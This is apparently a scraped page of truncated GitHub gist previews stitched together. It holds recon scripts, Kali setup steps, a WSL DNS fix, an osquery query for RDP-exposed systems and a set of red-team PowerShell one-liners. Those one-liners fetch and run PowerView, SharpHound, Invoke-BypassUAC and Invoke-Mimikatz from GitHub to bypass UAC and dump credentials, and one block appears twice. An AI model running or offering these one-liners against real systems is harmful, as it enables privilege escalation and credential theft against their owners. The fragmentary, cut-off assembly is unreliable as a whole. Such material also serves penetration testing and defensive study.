| #!/usr/bin/env python3 | |
| # v.0.2 | twitter.com/si9int | |
| import requests, sys | |
| from bs4 import BeautifulSoup as bs | |
| domain = sys.argv[1] | |
| subdomains = [] | |
| def get_csrf_params(): | |
| csrf_params = {} |
| #!/bin/bash | |
| curl -s -k -o $1.json "https://api.c99.nl/subdomainfinder?key=XXXXX-XXXXX-XXXXX-XXXXX&domain=$1&json" | |
| jq '.subdomains|.[].subdomain' $1.json > subdomain | |
| jq '.subdomains|.[].ip' $1.json > ips | |
| jq '.subdomains|.[].cloudflare' $1.json > cloudflare | |
| subdomains_len=$(wc -l subdomain | awk '{print $1}') | |
| ips_len=$(wc -l ips | awk '{print $1}') | |
| cloudflare_len=$(wc -l cloudflare | awk '{print $1}') |
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| More recent resolution: | |
| 1. cd ~/../../etc (go to etc folder in WSL). | |
| 2. echo "[network]" | sudo tee wsl.conf (Create wsl.conf file and add the first line). | |
| 3. echo "generateResolvConf = false" | sudo tee -a wsl.conf (Append wsl.conf the next line). | |
| 4. wsl --terminate Debian (Terminate WSL in Windows cmd, in case is Ubuntu not Debian). | |
| 5. cd ~/../../etc (go to etc folder in WSL). | |
| 6. sudo rm -Rf resolv.conf (Delete the resolv.conf file). | |
| 7. In windows cmd, ps or terminal with the vpn connected do: Get-NetIPInterface or ipconfig /all for get the dns primary and | |
| secondary. |
| apt update | |
| apt -y install wget gnupg dirmngr | |
| wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import | |
| gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6 | |
| echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list | |
| gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add - | |
| apt update | |
| apt -y upgrade | |
| apt -y dist-upgrade | |
| apt -y autoremove --purge |
| -- CVE-2019-0708 - Queries for 2008 R2 / Win7 & below systems that have RDP exposed publicly (remote_address is not internal IP) | |
| -- Modified From: @gepeto42 - https://twitter.com/gepeto42/status/1128383095428743172 | |
| -- If you use 172.16/22 internally, you will need to tweak this | |
| SELECT process_open_sockets.remote_address, os_version.name | |
| FROM process_open_sockets CROSS JOIN os_version | |
| WHERE process_open_sockets.local_port=3389 | |
| AND process_open_sockets.remote_address NOT LIKE '10.%' | |
| AND process_open_sockets.remote_address NOT LIKE '172.16%' | |
| AND process_open_sockets.remote_address NOT LIKE '192.168%' |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| #Tools based on a resolver.rb by @melvinsh | |
| #Repository: https://github.com/melvinsh/subresolve | |
| #Modified by @ehsahil for Personal Use. | |
| require 'socket' | |
| require 'colorize' | |
| begin | |
| domain = ARGV[0] | |
| rescue | |
| puts "Usage: ruby subdomain.rb domain" | |
| exit |
Download the appropriate Kali Linux .iso
I used a 64 bit .iso image, downloaded via HTTP. I downloaded the amd64 weekly version, as the pool linux headers (needed below for installation of wireless drivers) were ahead of the stable release kernel.
Download the SHA256SUMS and SHA256SUMS.gpg files from the same location.
